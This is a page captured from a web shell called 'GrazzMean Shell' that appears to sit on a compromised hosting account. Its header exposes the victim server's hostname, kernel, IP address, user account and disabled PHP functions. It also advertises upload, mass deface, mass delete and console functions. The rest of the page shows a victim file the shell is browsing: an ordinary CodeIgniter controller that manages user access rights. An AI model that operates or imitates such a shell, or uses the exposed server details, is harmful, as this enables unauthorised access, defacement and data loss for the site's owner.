shell bypass 403

GrazzMean Shell

: /home/homesquasz/rh/application/controllers/ [ drwx---r-x ]
Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl
upload mass deface mass delete console

name : Ligneacce.php 
<?php
/* 
 * Generated by CRUDigniter v3.2 
 * www.crudigniter.com
 */
 
class Ligneacce extends FrontApplication{
    function __construct()
    {
        parent::__construct();
        $this->load->model('Ligneacce_model');
    } 

    /*
     * Listing of ligneacces
     */
    function index()
    {
        $this->data['ligneacces'] = $this->Ligneacce_model->get_all_ligneacces();
        
        $this->data['_view'] = 'ligneacce/index';
        $this->load->view('layouts/main',$this->data);
    }

    /*
     * Adding a new ligneacce
     */
    function add()
    {   
        $this->load->library('form_validation');

		$this->form_validation->set_rules('userrole','userrole','required');
		
		if($this->form_validation->run())     
        {   
            print_r($this->input->post());
            foreach ($this->input->post('action_id') as $key => $value) {
                $params = array(
                    'users_id' => $this->input->post('userrole'),
                    'module_id' => $this->input->post('module_id'),
                    'action_id' => $value
                );
                $ligneacce_id = $this->Ligneacce_model->add_ligneacce($params);
            }
            
            redirect('ligneacce/index');
        }
        else
        {
			
            
            $this->data['_view'] = 'ligneacce/add';
            $this->load->view('layouts/main',$this->data);
        }
    }  

    /*
     * Editing a ligneacce
     */
    function edit($id)
    {   
        // check if the ligneacce exists before trying to edit it
        $data['ligneacce'] = $this->Ligneacce_model->get_ligneacce($id);
        
        if(isset($data['ligneacce']['id']))
        {
            $this->load->library('form_validation');

			$this->form_validation->set_rules('acces_id','Acces Id','required');
			$this->form_validation->set_rules('users_id','Users Id','required');
		
			if($this->form_validation->run())     
            {   
                $params = array(
					'acces_id' => $this->input->post('acces_id'),
					'users_id' => $this->input->post('users_id'),
                );

                $this->Ligneacce_model->update_ligneacce($id,$params);            
                redirect('ligneacce/index');
            }
            else
            {
				$this->load->model('Acce_model');
				$data['all_acces'] = $this->Acce_model->get_all_acces();

				$this->load->model('User_model');
				$data['all_users'] = $this->User_model->get_all_users();

                $data['_view'] = 'ligneacce/edit';
                $this->load->view('layouts/main',$data);
            }
        }
        else
            show_error('The ligneacce you are trying to edit does not exist.');
    } 

    /*
     * Deleting ligneacce
     */
    function remove($id)
    {
        $ligneacce = $this->Ligneacce_model->get_ligneacce($id);

        // check if the ligneacce exists before trying to delete it
        if(isset($ligneacce['id']))
        {
            $this->Ligneacce_model->delete_ligneacce($id);
            redirect('ligneacce/index');
        }
        else
            show_error('The ligneacce you are trying to delete does not exist.');
    }
    function getForListModule(){
        echo json_encode($this->Ligneacce_model->getForListModule());
    }
    function getForListAction(){
        echo json_encode($this->Ligneacce_model->getForListAction());
    }
}
© 2026 GrazzMean